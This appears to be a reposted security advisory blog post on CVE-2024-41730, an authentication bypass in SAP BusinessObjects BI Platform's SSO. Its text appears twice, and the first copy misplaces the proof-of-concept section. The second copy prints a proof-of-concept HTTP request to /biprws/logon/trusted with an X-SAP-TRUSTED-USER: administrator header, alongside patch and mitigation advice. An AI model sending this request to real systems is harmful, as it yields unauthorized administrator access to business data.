[PoC] Critical Authentication Vulnerability in SAP BusinessObjects Business Intelligence Platform

On August 13, 2024, SAP released a crucial security update to address a severe authentication vulnerability identified in the SAP BusinessObjects Business Intelligence Platform. This post provides an overview of the vulnerability, its potential impacts, and recommended mitigation steps to ensure your systems remain secure.

Vulnerability Overview

The vulnerability, tracked as CVE-2024-41730, has been assigned a critical CVSS v3.0 base score of 9.8. It specifically affects the Single Sign-On (SSO) functionality within the Enterprise authentication module of the SAP BusinessObjects Business Intelligence Platform. The issue arises from a missing authentication check, which allows unauthorized attackers to exploit a REST endpoint to obtain a logon token. This could lead to a full system compromise, exposing sensitive business intelligence data, enabling manipulation of reports and data, and potentially disrupting BI services.

Affected Versions

The vulnerability impacts the following versions of the SAP BusinessObjects Business Intelligence Platform:

ENTERPRISE 430ENTERPRISE 440

Proof of Concept

A demonstration of how the vulnerability can be exploited is shown below:

SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP004

Organizations are strongly advised to apply these patches immediately to protect their systems from potential exploitation.

Recommendations

To safeguard your SAP BusinessObjects Business Intelligence environment, start by identifying all instances of the platform within your organization. Prioritize the deployment of the necessary patches based on the criticality of each affected system. Additionally, conduct a comprehensive security assessment of your BI environment to detect any signs of compromise. Enhancing your authentication mechanisms and access controls, along with vigilant monitoring of system logs for unusual activities related to authentication and token generation, will further strengthen your defenses against potential threats.

Conclusion

The identification of CVE-2024-41730 underscores the critical need for robust security practices within business intelligence platforms. Organizations utilizing the SAP BusinessObjects Business Intelligence Platform must treat this vulnerability with the highest priority and implement the recommended patches without delay to protect their essential business data and operations.

Original Post: https://redrays.io/blog/critical-sap-businessobjects-authentication-vulnerability-cve-2024-41730/

​  On August 13, 2024, SAP released a crucial security update to address a severe authentication vulnerability identified in the SAP BusinessObjects Business Intelligence Platform. This post provides an overview of the vulnerability, its potential impacts, and recommended mitigation steps to ensure your systems remain secure.Vulnerability OverviewThe vulnerability, tracked as CVE-2024-41730, has been assigned a critical CVSS v3.0 base score of 9.8. It specifically affects the Single Sign-On (SSO) functionality within the Enterprise authentication module of the SAP BusinessObjects Business Intelligence Platform. The issue arises from a missing authentication check, which allows unauthorized attackers to exploit a REST endpoint to obtain a logon token. This could lead to a full system compromise, exposing sensitive business intelligence data, enabling manipulation of reports and data, and potentially disrupting BI services.Affected VersionsThe vulnerability impacts the following versions of the SAP BusinessObjects Business Intelligence Platform:ENTERPRISE 430ENTERPRISE 440Proof of ConceptA demonstration of how the vulnerability can be exploited is shown below: GET /biprws/logon/trusted HTTP/1.1
Host: SAP_BOBJ:6405
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-SAP-TRUSTED-USER: administrator Mitigation and Patch InformationSAP has promptly released patches to mitigate this vulnerability, ensuring that the Single Sign-On Enterprise authentication is secured by default once the patches are applied. The patches are available for the following versions:SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP005SBOP BI PLATFORM SERVERS 2025 – Patch Level SP00SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP004Organizations are strongly advised to apply these patches immediately to protect their systems from potential exploitation.RecommendationsTo safeguard your SAP BusinessObjects Business Intelligence environment, start by identifying all instances of the platform within your organization. Prioritize the deployment of the necessary patches based on the criticality of each affected system. Additionally, conduct a comprehensive security assessment of your BI environment to detect any signs of compromise. Enhancing your authentication mechanisms and access controls, along with vigilant monitoring of system logs for unusual activities related to authentication and token generation, will further strengthen your defenses against potential threats.ConclusionThe identification of CVE-2024-41730 underscores the critical need for robust security practices within business intelligence platforms. Organizations utilizing the SAP BusinessObjects Business Intelligence Platform must treat this vulnerability with the highest priority and implement the recommended patches without delay to protect their essential business data and operations.Original Post: https://redrays.io/blog/critical-sap-businessobjects-authentication-vulnerability-cve-2024-41730/   Read More Technology Blogs by Members articles 

#SAP

#SAPTechnologyblog